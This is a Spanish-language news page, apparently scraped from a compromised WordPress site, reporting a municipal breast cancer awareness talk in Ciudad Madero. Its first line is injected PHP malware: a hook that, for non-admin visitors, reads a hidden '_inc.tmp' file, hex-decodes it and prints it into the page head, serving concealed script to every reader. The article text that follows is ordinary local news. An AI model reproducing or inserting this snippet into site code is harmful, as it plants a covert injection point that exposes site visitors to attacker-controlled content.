if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Refuerzan en Ciudad Madero acciones de concientización para la detección oportuna del cáncer de mama – Reporte Noreste
Conéctate con nosotros

Acciones de Gobierno

Refuerzan en Ciudad Madero acciones de concientización para la detección oportuna del cáncer de mama

Refuerzan en Ciudad Madero acciones de concientización para la detección oportuna del cáncer de mama

En el marco del “Mes Rosa” y como parte de las acciones para la detección oportuna del cáncer de mama, el Instituto Municipal de la Mujer de Ciudad Madero llevó a cabo la plática “Mi mejor amiga, soy yo”, a cargo de la conferencista “Ruth de la Garza Saldívar.

En Sala de Cabildo del Ayuntamiento maderense se reunieron síndicos, regidores, trabajadoras municipales, estudiantes y ciudadanía en general para escuchar la conferencia, cuyo propósito es contribuir en la concientización de la sociedad sobre la prevención y detección oportuna de este tipo de cáncer.

En su mensaje de bienvenida, la directora de la dependencia, Esperanza Balderas Gómez, agradeció al alcalde Adrián Oseguera Kernion y a la presidenta del Sistema DIF Madero, señora Ana Cristina Organista de Oseguera, las acciones encaminadas al bienestar de las mujeres.

“En este mes de octubre, mes rosa, fomentamos el compromiso de sensibilizar acerca de la prevención del cáncer de mama, bajo el lema tócate para que no te toque. Seguiremos efectuando diferentes programas para llegar a cada una de ustedes”, expresó.

Por su parte, la conferencista habló sobre el papel de la mujer en la sociedad, su actitud, la importancia de la autoexploración y las alertas sobre el cáncer de mama, entre otros temas.

“El cáncer de mama no respeta edad, la clave está en la autoexploración, yo los invito a recordar que es nuestra tarea amarnos, cuidarnos, explorarnos, porque a tiempo todo se puede superar”, comentó.

Al finalizar la plática, la directora del Instituto Municipal de la Mujer y la directora del Sistema DIF Madero, Amalia Pérez Rodríguez, entregaron reconocimientos a la ponente Ruth de la Garza Saldívar y a la representante de la Escuela Normal Superior de Ciudad Madero, Juana Zapiain Betancourt.

La actividad concluyó con la formación de un lazo rosa en la explanada de la Presidencia Municipal, con la participación de funcionarios y ciudadanía maderense.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Acciones de Gobierno